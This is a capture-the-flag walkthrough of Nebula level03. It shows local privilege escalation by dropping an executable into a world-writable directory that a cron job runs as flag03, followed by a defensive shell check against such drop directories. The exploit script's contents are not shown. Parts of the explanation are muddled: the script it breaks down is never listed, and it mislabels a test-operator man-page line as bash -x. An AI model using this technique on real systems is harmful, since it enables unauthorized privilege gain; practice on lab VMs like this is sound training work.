Nebula level03 Walkthrough

Nebula is a vulnerable virtual machine which has a variety of weaknesses and vulnerabilities in a Linux system.

Description of level03
“Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.”

Go through the home directory

level03@nebula:~$ cd /home/flag03/
level03@nebula:/home/flag03$ ls -la
total 6
drwxr-x--- 3 flag03 level03 103 2011-11-20 20:39 .
drwxr-xr-x 1 root root 100 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03 3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03 675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03 3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh

The writable.d directory is open to the world for reading, writing and executing (drwxrwxrwx), and next to it there is a script, writable.sh.

Breakdown of the above program
ulimit

Linux has a per-user limit on the maximum number of processes. It lets us control how many processes an existing user on the server is allowed to have. To improve performance, we can safely set the process limit for the super-user root to unlimited.

$ ulimit -u unlimited

bash -x

$ man bash
-x file
True if file exists and is executable

The above script loops through the files in the writable.d directory, executes each of them and removes them afterwards.

Vulnerability

The vulnerability lies in writable.sh, which runs every file in the writable.d directory, combined with the fact that writable.d is world-writable: any local user can drop a file there and have it executed by the cron job.
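Seen from the defender's side, the fix is for the scheduled runner to refuse anything it cannot trust. The following is an added example, not part of the original walkthrough or of the Nebula VM: a runner that executes a file only if both the file and its directory are owned by the expected UID and carry no group/other write bit. The function names are hypothetical and GNU stat is assumed.

```shell
#!/bin/sh
# Added example, not from the walkthrough. Assumes GNU stat (Linux).
# Function names are hypothetical.

# perms_ok PATH UID: PATH is owned by UID and has no group/other write bit.
perms_ok() {
    info=$(stat -c '%u %a' -- "$1" 2>/dev/null) || return 1
    [ "${info% *}" = "$2" ] || return 1
    [ $(( 0${info#* } & 022 )) -eq 0 ]
}

# safe_to_run FILE UID: regular, non-symlink file; directory and file both
# pass perms_ok. Checking the directory also closes the swap-after-check
# race, because nobody else can replace entries in it.
safe_to_run() {
    [ -f "$1" ] || return 1
    [ ! -L "$1" ] || return 1
    perms_ok "$(dirname -- "$1")" "$2" && perms_ok "$1" "$2"
}

# run_dropdir DIR UID: run only files that pass, log refused paths to
# stderr, and echo the number of refused files on stdout.
run_dropdir() {
    refused=0
    for f in "$1"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # empty directory
        if safe_to_run "$f" "$2"; then
            sh "$f" >/dev/null
        else
            echo "refused: $f" >&2
            refused=$((refused + 1))
        fi
    done
    echo "$refused"
}

# Constructed demo: the same job passes in a private directory and is
# refused once that directory is made world-writable like writable.d.
demo=$(mktemp -d) && printf 'echo job ran\n' > "$demo/job.sh"
chmod 755 "$demo"; chmod 644 "$demo/job.sh"
echo "refused (dir 755): $(run_dropdir "$demo" "$(id -u)")"
chmod 777 "$demo"
echo "refused (dir 777): $(run_dropdir "$demo" "$(id -u)")"
rm -rf "$demo"
```

With a drwxrwxrwx directory such as writable.d, every file is refused regardless of who created it, which is the signal that the directory permissions themselves need fixing.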

Game Plan

  • Identify the GID and UID of the flag03 account
level03@nebula:/home/flag03$ cat /etc/passwd | grep "flag03"
flag03:x:996:996::/home/flag03:/bin/sh
  • Script a program which executes /bin/bash as flag03
  • Now we have to make the cronjob compile and execute our script. The cronjob is running with the flag03 permissions.
level03@nebula:/home/flag03/writable.d$ chmod +x run.sh
level03@nebula:/home/flag03/writable.d$ ls
run.sh
level03@nebula:/home/flag03$ id
uid=1004(level03) gid=1004(level03) groups=1004(level03)
level03@nebula:/home/flag03$ ls
exploit writable.d writable.sh
level03@nebula:/home/flag03$ ./exploit
flag03@nebula:/home/flag03$ getflag
You have successfully executed getflag on a target account
flag03@nebula:/home/flag03$ id
uid=996(flag03) gid=996(flag03) groups=996(flag03),1004(level03)

Happy Hacking !!!